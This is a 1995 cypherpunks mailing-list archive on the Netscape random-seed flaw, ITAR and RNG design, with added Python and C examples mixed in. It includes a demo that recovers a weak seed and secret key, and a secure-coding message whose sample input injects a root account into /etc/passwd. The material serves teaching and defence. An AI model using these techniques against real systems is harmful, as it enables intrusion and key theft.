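                    return (sec, tick, pid), tries
    return None, tries


def demo() -> dict:
    # Constructed sample: the machine state in use when the seed was made.
    true_state = (811680402, 37, 1432)
    seed = machine_state_seed(*true_state)
    public_nonce = derive(seed, b"nonce")   # visible on the wire
    secret_key = derive(seed, b"key")       # meant to stay private

    # What an observer can bound: a 2 s window, 10 ms ticks, 1000 possible pids.
    secs = range(811680401, 811680403)
    ticks = range(100)
    pids = range(1000, 2000)

    state, tries = recover_state(public_nonce, secs, ticks, pids)
    key_again = derive(machine_state_seed(*state), b"key")

    # Same protocol, seed drawn from the OS CSPRNG instead of machine state.
    strong_nonce = derive(secrets.token_bytes(16), b"nonce")
    strong_state, strong_tries = recover_state(strong_nonce, secs, ticks, pids)

    return {
        "recovered_state": state,
        "tries": tries,
        "key_recovered": key_again == secret_key,
        "demo_bits": seed_entropy_bits(2, 100, 1000),
        # Looser bounds: 60 s window, microsecond clock, 32768 pids.
        "loose_bits": seed_entropy_bits(60, 1_000_000, 32768),
        "csprng_state": strong_state,
        "csprng_tries": strong_tries,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Even with the looser bounds the seed carries about 41 bits, although the hash output is 128 bits wide; the seed taken from the OS source is not found anywhere in the enumerated space.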





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 22:05:54 PDT
To: cypherpunks@toad.com
Subject: Re: NSA and Netscape Crack
In-Reply-To: <ac85fa9f010210046fb1@DialupEudora>
Message-ID: <43qrpq$gd5@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <ac85fa9f010210046fb1@DialupEudora>, norm@netcom.com (Norman Hardy) writes:
> At 3:46 PM 9/19/95, Jim Ray wrote:
> ....
> >I don't expect to know NSA's specific brute-force capability, but
> >does anyone know if the NSA has *ever* found a glaring weakness in
> >software and then told its author(s) or owner(s) about it? Do "we"
> >perform the "COMSEC" role Tim was speaking of better than the NSA?
> >JMR
> ....
> Once upon a time NSA would find weaknesses in friends' crypto systems and
> tell them about it -- depending, of course, on the situation. It was a
> reciprocal practice. We don't know that NSA didn't tell Netscape.

  As far as I know the NSA did not tell Netscape anything about this
RNG vulnerability.  If they had we would have fixed it immediately and
put up a patch.  Believe it or not we don't like being trashed for
being stupid all over the net, print media, and TV.  As far as I know
the NSA have not given us any advice about how to make our system
stronger.  I've heard rumors that they were quite upset when they
learned that SSL's 40-bit RC4 was actually 40-bit secret and 88-bit salt.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Wed, 20 Sep 95 20:49:03 PDT
To: cypherpunks@toad.com
Subject: Netscape Servers too ? (forwarded message from Marc VanHeyningen)
Message-ID: <9509210319.AA09639@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


------- start of forwarded message (RFC 934 encapsulation) -------
From: marcvh@spry.com (Marc VanHeyningen)
To: Wayne Wilson <wwilson@umich.edu>
Cc: Kazuma Andoh <andoh@nikkeibp.co.jp>, www-security@ns2.rutgers.edu
Subject: Re: What's the netscape problem 
Date: Wed, 20 Sep 1995 07:51:47 -0700

[...]
> http://home.netscape.com/newsref/std/random_seed_security.html

The interesting part of this article is the discussion of random seed
weaknesses on the *server* side.  If true, this means anybody could use
the random-seed hole to reverse engineer the process by which the
server's private key information was generated and break that keypair
with much, much much less effort than would normally be needed to factor
a 512-bit RSA key.

(Note that I'm not entirely sure Netscape's server uses 512 bit RSA keys,
since the documentation, technical data sheets, and generation process
don't give any clue about what key size is being used.  Guess they don't
want customers worrying their pretty little heads about it.)

This would mean merely getting a fixed server would be insufficient; every
Netscape server user would need to generate a new keypair, get a new Verisign
certificate, and revoke the old one.

(Oops, wait, there's no way to revoke the old one.  I guess you just have to
hope nobody does this before all those certificates expire.)

- - Marc
------- end -------

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

smuggle nuclear North Korea SDI cracking Mossad DES





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "NSB's Portable (via RadioMail)" <nsb@radiomail.net>
Date: Thu, 21 Sep 95 05:33:39 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: first virtual "security" (!!) (was Re: Security Flaw Is Discovered InSoftware Used in Shopping)
Message-ID: <RM:c0d83d13.000a7d3b.0>
MIME-Version: 1.0
Content-Type: text/plain


At  4:32 AM 9/21/95 +0200, Laurent Demailly wrote:
>You have excellent points in your detailed answer, thank you, but

Thanks.  I'm glad to be able to conduct this discussion at a cordial and
intelligent level.

>If FV was as used as SSL could be, what prevents, to use your terms,
>someone to get MILLIONS of FV's identifiers and use each one only
>once, etc ... (imo your figures about SSL and crypto softs risks are
>over evaluated, so I over evaluate the 'risks' of yours using same
>assumptions)

I think you still don't get it, Laurent.  If you intercept millions of
credit cards, you immediately have something very valuable and untraceable.
 An FV-ID is much less useful than a credit card number, because it only
works with email confirmation and only works on the net.  And merely
intercepting them doesn't get you anything -- you have to be able to answer
the confirmation messages, which is much harder to do "en masse" than
passively sniffing for things (and possibly then decrypting them).  And a
scheme that also replies to such messages is far more likely to leave
traces by which the criminal is caught.

In other words, when you look at the "millions of interceptions" case, the
value of doing this is lower for FV, the difficulty of automating it in the
large scale is higher, and the risk of detection is higher, as compared
with a one-way scheme that transmits credit cards, whether encrypted or
not.

>There can't be more security by transferring data on the clear
>compared to an encrypted one... except maybe that people using
>encryption can often feel overconfident. 

Of course there can, if you're not talking about the same data, which we're
not.  It's much safer to transmit something without high intrinsic value in
unencrypted form than to transmit something with high intrinsic value in
encrypted form.  That's why FV-ID's were designed the way they are -- low
intrinsic value, easy to revoke & reissue, etc.  By analogy, it is safer to
send a weather report unencrypted than to send detailed instructions about
nuclear weapons encrypted.

>So, as someone pointed out,
>it is not that much a problem about CC# which are available easily
>anyway, but in fact, using encrypted communications is the only way to
>ensure (some) *privacy*, in addition to being a security improvement. 

Also not true.  A scheme like FV's gives a fairly high privacy level
through the use of pseudonyms.  Your FV-ID can be traced to you *only* by
FV, and we won't hand out that information without a court order.

>financial insecurity never was a problem as
>long as it remains under a small %.

This is an amazing statement, Laurent.  It's sort of like saying that
building a city in the middle of a flood plain isn't a problem as long as
there isn't a flood.  You can't dismiss even a low-probability disaster if
the consequences of the disaster are extremely high.

If the SSL bug had been discovered AFTER there were hundreds of millions of
credit cards being transmitted via SSL, and if the person who discovered it
had criminal intent, the entire global credit card infrastructure really
would have been endangered.  Personally, I'm always suspicious of any
claims to have "fixed the last bug", so I don't see any reason to assume
this isn't inevitable in the long run if a scheme like SSL is used.

>Anyway, if you have happy customers, good for you... I'd suggest that
>you'd use "Security through Clarity" as motto ;-)

That's not a bad motto.  I'd prefer to describe our system as focusing on
practical, comprehensive security rather than chasing the myth of perfect
cryptographic security.  (For example, we've probably put more effort into
making our server secure from breakins than just about any other site on
the Internet.)

We're not opposed to cryptography, by the way.  There are some obvious
places where the use of digital signatures could directly enhance our
system, and we're pursuing them.  It has also not escaped our notice that,
even though we strongly believe that transmitting FV-ID's in the clear is
safer than transmitting credit cards encrypted, it would be safer STILL to
transmit the FV-ID's encrypted -- sort of the best of both worlds.  And you
can count on our doing that when there is a good Internet infrastructure
for doing so, which we don't yet believe to be the case.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Wed, 20 Sep 95 21:05:02 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Project: a standard cell random number generator
In-Reply-To: <ac86115235021004fbe4@[205.199.118.202]>
Message-ID: <9509210404.AA09855@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



On the opposite, using some kind of small hardware devices plugged in
the serial or // port could be a good point to help actual sales of
softwares that would depend on it (ie you sell the hardware only with
the soft, so ppl have to actually buy it to get full security instead
of stealing it).
[I'm playing devil's lawyer here]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

KGB Uzi plutonium Ortega Mossad South Africa cracking




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlton@ghoti.mcom.com (Phil Karlton)
Date: Wed, 20 Sep 95 23:06:30 PDT
To: cypherpunks@toad.com
Subject: Re: (none)
In-Reply-To: <199509201509.IAA19829@blob.best.net>
Message-ID: <43qvbk$lra@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald <jamesd@echeque.com> writes:
    Whenever you need a random number, take a one way checksum, 
    for example MD5, of the most recently altered part of that 
    buffer.  Use that as your random number. 

How is this any better than feeding the data into the MD5
hash as I go? This is not a rhetorical question.

PK
-- 
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation
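
One concrete difference between the two designs discussed above, as an added example that is not code from either poster or from Netscape: it compares what each output depends on when two event histories differ only in their early input. The window size, buffer size, event strings and class names are assumptions; MD5 is used only because the thread names it.

```python
import hashlib

WINDOW = 16  # assumption: size in bytes of "the most recently altered part"


class BufferRNG:
    """Quoted scheme: events go into a ring buffer; output hashes the newest bytes."""

    def __init__(self, size: int = 64):
        self.buf = bytearray(size)
        self.pos = 0

    def add(self, event: bytes) -> None:
        for byte in event:
            self.buf[self.pos] = byte
            self.pos = (self.pos + 1) % len(self.buf)

    def output(self) -> bytes:
        size = len(self.buf)
        recent = bytes(self.buf[(self.pos - WINDOW + i) % size] for i in range(WINDOW))
        return hashlib.md5(recent).digest()


class RunningHashRNG:
    """Reply's alternative: every event is fed into one MD5 state as it arrives."""

    def __init__(self):
        self.state = hashlib.md5()
        self.requests = 0

    def add(self, event: bytes) -> None:
        # Length prefix keeps event boundaries unambiguous inside the hash input.
        self.state.update(len(event).to_bytes(2, "big") + event)

    def output(self) -> bytes:
        # Mixing a request counter in makes back-to-back outputs differ.
        self.requests += 1
        self.state.update(b"out" + self.requests.to_bytes(8, "big"))
        return self.state.digest()


# Constructed event streams: different early input, identical recent input.
EARLY_A = [b"key:a t=10432", b"key:q t=10977"]
EARLY_B = [b"key:z t=55120", b"key:m t=58003"]
RECENT = [b"mouse:120,340", b"mouse:121,342"]


def feed(rng, events):
    """Add each event to the generator and return it for chaining."""
    for event in events:
        rng.add(event)
    return rng


def compare() -> dict:
    buf_a = feed(BufferRNG(), EARLY_A + RECENT)
    buf_b = feed(BufferRNG(), EARLY_B + RECENT)
    run_a = feed(RunningHashRNG(), EARLY_A + RECENT)
    run_b = feed(RunningHashRNG(), EARLY_B + RECENT)
    return {
        # True: input older than the window no longer influences the output.
        "buffer_ignores_early": buf_a.output() == buf_b.output(),
        # False: the running state still depends on every event ever fed.
        "running_ignores_early": run_a.output() == run_b.output(),
        # True: two requests with no new events return the same bytes.
        "buffer_repeats": buf_a.output() == buf_a.output(),
        # False: the request counter separates consecutive outputs.
        "running_repeats": run_a.output() == run_a.output(),
    }


if __name__ == "__main__":
    for name, value in compare().items():
        print(f"{name}: {value}")
```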




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 21 Sep 95 03:42:30 PDT
To: hallam@w3.org
Subject: Re: Cybersecurity
In-Reply-To: <9509201549076057@ci.diamond-bar.ca.us>
Message-ID: <Pine.SUN.3.91.950921061134.12901A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 7 Sep 1995 hallam@w3.org wrote:

> The UK Labour party is opposed to key escrow "we do not accept the "clipper 
> chip" argument". The Tories have less than half the level of popular support and
> are barely recognisable as a government.
> 
>         Phill

Wait till Labour finds out that crypto makes "The Caring Society" 
impossible.  Perhaps they'll change their view then.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Thu, 21 Sep 95 00:30:00 PDT
To: cypherpunks@toad.com
Subject: Re: FROM A FRIEND . . .
In-Reply-To: <199509201648.MAA14624@panix.com>
Message-ID: <43r488$met@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <43qvn4$mm@calum.csclub.uwaterloo.ca>, iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg) writes:
> In article <43qrhf$gd5@tera.mcom.com>,
> Jeff Weinstein <jsw@neon.netscape.com> wrote:
> >  I think that the general opinion of engineers and management here at
> >Netscape is that it would be A Really Good Thing to have our US-only
> >128+ bit version of Netscape Navigator available for download by US
> >citizens and others who are not legally prohibited from using it.
> 
> Who _is_ legally prohibited from using it?  I think there are some countries
> where the very use of crypto is illegal (could someone please list them?),
> but who else?
> 
> There are some people that may be legally prohibited from _obtaining_ it
> from a US site (ITAR yadda), but even so, if JRFurriner downloads
> crypto from company C's site in the US, who's guilty of ITAR-violation?
> Company C for making it available, or JRF for initiating the action
> that caused the bits to be sent out of the country?

  Poor choice of words on my part.  My understanding is that we can not
export our US-only product, except to canada - for the use of canadian
citizens.  I also believe that it is illegal for anyone except US citizens,
permanent residents of the US (green card holders) and Canadian citizens
to use it, even within the US.  I'm not a lawyer, and I've not read
all of ITAR myself, so I could be totally wrong...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Thu, 21 Sep 95 04:30:45 PDT
To: cypherpunks@toad.com
Subject: Fraud Fraut Froth
Message-ID: <199509211130.HAA20039@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


NY Times, Sept 21, 1995.

Fraud Can Flourish Without the Internet

To the Editor:

Your Sept. 19 front-page article on the discovery by two
University of California graduate students of a flaw in
Netscape, the software used for purchases over the Internet's
World Wide Web, raises a number of obvious questions.

First, who needs high tech to perpetrate fraud? Any
unscrupulous commercial employee could use or sell your credit
card number without employing technology.

Every time you hand your card to a waiter in a restaurant, it
disappears for several minutes. The department store clerks
and gas station attendants you deal with also have access to
your card number. How secure is that?

Ever give your credit card number over the phone to make a
purchase from a mail-order house? Or to secure a reservation
at a hotel? Who's to say that the employees you're speaking
with are honest? Or that your phone is not tapped? Or theirs?

I shop on the Internet; I may get ripped off. What's my
liability? Fifty bucks -- same as the other scenarios I've
described. That's in my credit agreement with the card issuer.

So why all the hoopla? Is credit card fraud significantly more
prevalent on the Internet than in other modes of purchasing?

Or is the banking industry whipping up hysteria among
purchasers to curb fraud losses? Was the work of those
graduate students funded by someone -- directly or indirectly?
If so, by whom? A banking consortium? A high-tech company
working on some patentable security scheme?

Robert Herrig
Peekskill, N.Y., Sept. 19, 1995.

The writer is a systems consultant.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Thu, 21 Sep 95 04:52:49 PDT
To: anonymous@freezone.remailer.mindport.net
Subject: Re: Fraud Fraut Froth
In-Reply-To: <199509211130.HAA20039@light.lightlink.com>
Message-ID: <Pine.SUN.3.91.950921075223.28417A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Sep 1995 anonymous@freezone.remailer.mindport.net wrote:

> NY Times, Sept 21, 1995.
> 
> Fraud Can Flourish Without the Internet
> 
> To the Editor:
> 
> Your Sept. 19 front-page article on the discovery by two
> University of California graduate students of a flaw in
> Netscape, the software used for purchases over the Internet's
> World Wide Web, raises a number of obvious questions.
> 
> First, who needs high tech to perpetrate fraud? Any
> unscrupulous commercial employee could use or sell your credit
> card number without employing technology.
> 
> Every time you hand your card to a waiter in a restaurant, it
> disappears for several minutes. The department store clerks
> and gas station attendants you deal with also have access to
> your card number. How secure is that?

[...]

> 
> Robert Herrig
> Peekskill, N.Y., Sept. 19, 1995.
> 
> The writer is a systems consultant.

[For Netscape?]


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 08:28:18 PDT
To: karlton@netscape.com
Subject: Re: "random" number seeds vs. Netscape
Message-ID: <9509211524.AA17588@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Philip L. Karlton said:
> 
> I agree, but I have a hard time arguing with those that assert that the security
> of UNIX is weak enough that given what we are doing for the patch it will
> be easier to become root from a logged in account than to hack the seed.
> 
Why would you have to argue with them?  When they say that it's easier to 
become root from a logged in account tell them, "Good, that's just as it 
should be!"  It's a feature, not a problem!

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 08:30:42 PDT
To: jordan@Heuristicrat.COM
Subject: Re:  RSA Prevails In Arbitration Against Cylink
Message-ID: <9509211527.AA17593@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> Just a note for those who aren't aware, Business Wire is a pay-per-use
> "news release" service.  That is, RSA wrote the contents of what Bob
> (Hi!) posted.
> 
> The clue is at the bottom of the "story":
> 
> 	CONTACT: RSA
> 	Kurt Stammberger, 415/595-8782
> 	kurt@rsa.com
> 
> This is not to say anything pro or con about the content of the press
> release; just that it wasn't written by a third party.
> 
> /jordan
> 

I can't imagine that anyone wouldn't have known that, it was written from
RSA's point of view.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 21 Sep 95 05:36:10 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Please send me SSL problems...
Message-ID: <9509211235.AA20792@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>None of these organisations have mentioned GSSAPI to me.

>Do you have a source?

Digital:  ask John Wray.
IBM:  find someone in the DSOM group
HP:  no name I can give.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Thu, 21 Sep 95 01:41:27 PDT
To: cypherpunks@toad.com
Subject: Re: Please send me SSL problems...
In-Reply-To: <eay@mincom.oz.au>
Message-ID: <43r8e5$ove@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509210118.ZM154@tofuhut>, jsw@netscape.com (Jeff Weinstein) writes:
>   I don't think that the API that SSLRef export is not particularly interesting.

  Yikes!!  I can't believe I wrote that.  What I meant was:

I don't think that the API that SSLRef exports is particularly interesting.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 08:57:20 PDT
To: perry@piermont.com
Subject: Re: "random" number seeds vs. Netscape
Message-ID: <9509211553.AA17620@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry said:
> 
> Also be especially careful about how you run the thing! Don't use
> popen or anything like it!

There's nothing inherently wrong with using popen or system.  The problem
arises when you use information given to you from outside as the argument
to popen or system without checking it.  You should have an awareness that
whatever you pass to system or popen is essentially being passed as the
commandstring to a:

    execl("/bin/sh", "sh", "-c", commandstring, (char *)0);

Make sure you know the implications of this.  If you know that what you're
passing can happily be exec'd directly, it's more efficient to do an exec 
yourself instead of (effectively) having a sh exec'd to exec your code.
Of course you can see that you shouldn't do something like:

    cout << "Enter the directory to list: ";
    cin >> buffer;
    system(buffer);

especially if you're running with any sort of privileges.  Suppose someone
entered:

    / ; echo >>/etc/passwd "gotcha::0:0:Intruder Man:/:/sbin/sh

Obviously if this program was being run as root you'd be in trouble.
If it was running as a user it would let them do something like add
an .rhosts for the user that would let them get on the machine.  Once
on a machine it's often fairly easy to leverage that access into root
access.

Oh well, I could talk about security all day:)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/
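
Added example, not part of the message above: one way to do the direct exec
it recommends, so that no /bin/sh ever parses the user's string. The function
name list_dir_noshell and the inputs in main are made up for illustration, and
the code assumes ls is installed at /bin/ls or /usr/bin/ls.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * List `dir` by exec'ing ls directly, with no shell in between.
 * The caller's string becomes exactly one argv element, so shell
 * metacharacters (; | & $ ` >) have no special meaning. The "--"
 * stops ls from treating a leading '-' in `dir` as an option.
 *
 * The child's stdout is copied into `out` (NUL-terminated, truncated to
 * outsz-1 bytes). Returns the child's exit status, or -1 if it could
 * not be run or did not exit normally.
 */
int list_dir_noshell(const char *dir, char *out, size_t outsz)
{
    int fds[2];
    int status;
    size_t used = 0;
    pid_t pid;

    if (dir == NULL || out == NULL || outsz == 0)
        return -1;
    out[0] = '\0';

    if (pipe(fds) == -1)
        return -1;

    pid = fork();
    if (pid == -1) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }

    if (pid == 0) {
        /* Child: fixed program path, fixed minimal environment, and the
         * untrusted string passed only as data. */
        char *const argv[] = { "ls", "--", (char *)dir, NULL };
        char *const envp[] = { "PATH=/bin:/usr/bin", "LC_ALL=C", NULL };

        close(fds[0]);
        if (dup2(fds[1], STDOUT_FILENO) == -1)
            _exit(126);
        close(fds[1]);
        execve("/bin/ls", argv, envp);
        execve("/usr/bin/ls", argv, envp);   /* fallback location */
        _exit(127);                          /* neither exec worked */
    }

    /* Parent: drain the pipe completely so the child never blocks. */
    close(fds[1]);
    for (;;) {
        char buf[512];
        ssize_t n = read(fds[0], buf, sizeof buf);

        if (n > 0) {
            size_t room = outsz - 1 - used;
            size_t take = (size_t)n < room ? (size_t)n : room;
            memcpy(out + used, buf, take);
            used += take;
        } else if (n == 0 || errno != EINTR) {
            break;
        }
    }
    out[used] = '\0';
    close(fds[0]);

    while (waitpid(pid, &status, 0) == -1) {
        if (errno != EINTR)
            return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed inputs: a real directory, then a string shaped like the
     * hostile entry in the message, with a harmless second command. */
    const char *inputs[] = { "/", "/ ; echo INJECTED" };
    char out[4096];
    size_t i;

    for (i = 0; i < 2; i++) {
        int rc = list_dir_noshell(inputs[i], out, sizeof out);
        printf("input=[%s] exit=%d stdout_bytes=%lu\n",
               inputs[i], rc, (unsigned long)strlen(out));
    }
    return 0;
}
```

With the second input, ls is asked for one directory literally named
"/ ; echo INJECTED", fails to find it, and nothing after the semicolon runs.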




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: landon@netcom.com (Landon Dyer)
Date: Thu, 21 Sep 95 09:14:13 PDT
To: cypherpunks@toad.com
Subject: Re: FROM A FRIEND . . . (the joys of boating)
Message-ID: <199509211600.JAA10128@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>On 21 Sep 1995, Jeff Weinstein wrote:
>>   My understanding is that we can not
>> export our US-only product, except to canada - for the use of canadian
>> citizens.  I also believe that it is illegal for anyone except US citizens,
>> permanent residents of the US (green card holders) and Canadian citizens
>> to use it, even within the US.  I'm not a lawyer, and I've not read
>> all of ITAR myself, so I could be totally wrong...
>
> All the same, if anyone wants an easy and economical
>way to get around ITAR, have someone do your crypto software development 
>just north of the border (Vancouver's just north of Seattle and close 
>enough to Silicon Valley, with excellent net-access) or at least just
>publish it here first.

  here's a possible bullshit wrinkle.  i'm not a lawyer, but one of my
bosses was, once.

  said boss owned a boat that was of canadian registry.  he was a
canadian citizen with a green card.  he *claimed* that, even when
docked in the SF bay area, his boat was technically considered
canadian territory, due to some maritime law malarky.  US authorities
theoretically had to go through various hoops to legally board his
vessel.

  i wouldn't try to halt a SWAT team, or even the local fuzz, with
this tidbit of legal gaga.  but doing crypto development on such a
vessel might hold up in court for something as squishy as ITAR.

  naturally, commuting to canada is probably a *lot* cheaper than
owning a boat.  the uninitiated have little idea what these holes-
in-the-water really cost.... :-)


-landon
  (returning to lurk-mode)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "NSB's Portable (via RadioMail)" <nsb@radiomail.net>
Date: Thu, 21 Sep 95 09:05:31 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] "hacker" was: first virtual "security"
Message-ID: <RM:c0d83d13.000a7f74.0>
MIME-Version: 1.0
Content-Type: text/plain


At  2:03 AM 9/21/95 -0400, Ian Goldberg wrote:
>In article <0kMA2EqMc50eMEb4Yx@nsb.fv.com>,
>Nathaniel Borenstein  <nsb@nsb.fv.com> wrote:
>>If an SSL-like scheme were in wide use world-wide, the hacker who just
>>made a name for himself by breaking SSL could instead have gone down in
>
>Ugh.  That word again.  I'm only 22, but I'm old enough to remember
>when there were people called "crackers", and being called a "hacker"
>was a _good_ thing.

Hey, this guy didn't steal anything, and he publicized the hole.  He wasn't
a criminal, he was a good guy.  That's why I called him a hacker.  -- NB




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 21 Sep 95 06:07:41 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Munitions shirt (again)
Message-ID: <m0svlNY-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

: At 3:49 PM 9/20/95, Ian Goldberg wrote:
: >So, Dave and I got free munitions shirts (they're different, though;
: >the font is smaller and they have a bunch of X'd out Constitutional
: >Amendments on the back; I think they were designed by Joel Furr) for
: >our bug find.
: >
: >So I'm wearing it today.  The thing is, I live in International House,
: >a residence that has 50% non-Americans.
: >
: >So, any consensus as to whether it's actually illegal to do so?  I
: >remember some disagreement a few weeks ago that AFAIK wasn't resolved.
: 
: The _consensus_ here seems to be: "This t-shirt is illegal to wear in front
: of non-Americans," judging by the comments here.

Assuming that the International Traffic in Arms Regulations are the
law (rather than the unconstitutional silliness that they actually
are), this consensus is correct.  The ITAR forbid the ``disclosure''
of cryptographic ``software''--very broadly defined--to ``foreign''
persons ``within or without the United States.''  It says nothing
about the medium of the disclosure: whether it is a T-shirt or
computer screen.
 
: The _reality_ is quite different, I think, and the "this shirt is illegal"
: hype is, in my opinion, just that, hyperbole. Even hyperbull, too.
: 
: Books and written articles containing crypto algorithms are _not_ illegal
: for "furriners" to look at. The t-shirt contains at most a fuzzy printing
: of an algorithm that has been widely printed in various books and in
: articles in mailing lists like ours.
 
The fact that the government does not dare to try to enforce the ITAR
against those who publish cryptographic software without a license (and
the fact that the Office of Defense Trade Controls has waived its jurisdiction
to require a license in one case for a book where it retained
jurisdiction for a CDrom with the same information) does not mean that
it is not a violation of the ITAR to publicly wear a T-shirt with
cryptographic software on it; although it does strongly suggest that
no one will be prosecuted for such violations.

And that is just as well, since the posting on an anonymous FTP server
of the C program that cracks the seed for the Netscape security routines
is also a technical violation of the ITAR, as even Mr. May will
perhaps concede.  The fact that warning the world of this security
breach is a violation of the ITAR simply shows how silly--and how
dangerous--is the ITAR's licensing scheme for the publication
of cryptographic software.

: (I agree that there are some unresolved issues with ostensibly
: machine-readable forms. The t-shirt is not machine-readable by any
: plausible interpretation of machine-readable.)

There is nothing in the ITAR that refers to ``machine-readable'' so
there is no need to interpret that term.  
 
- --
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Sep 95 09:00:23 PDT
To: John Gilmore <cypherpunks@toad.com
Subject: Re: Netscape is doing well -- give 'em a break.
Message-ID: <ac86db1d3c02100464ca@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:52 AM 9/21/95, John Gilmore wrote:

>All progress is by steps.  Let's step on each others' shoulders, not
>on each others' toes.  Netscape is doing us a favor by pushing strong
>crypto.  We are doing them a favor by pointing out problems before
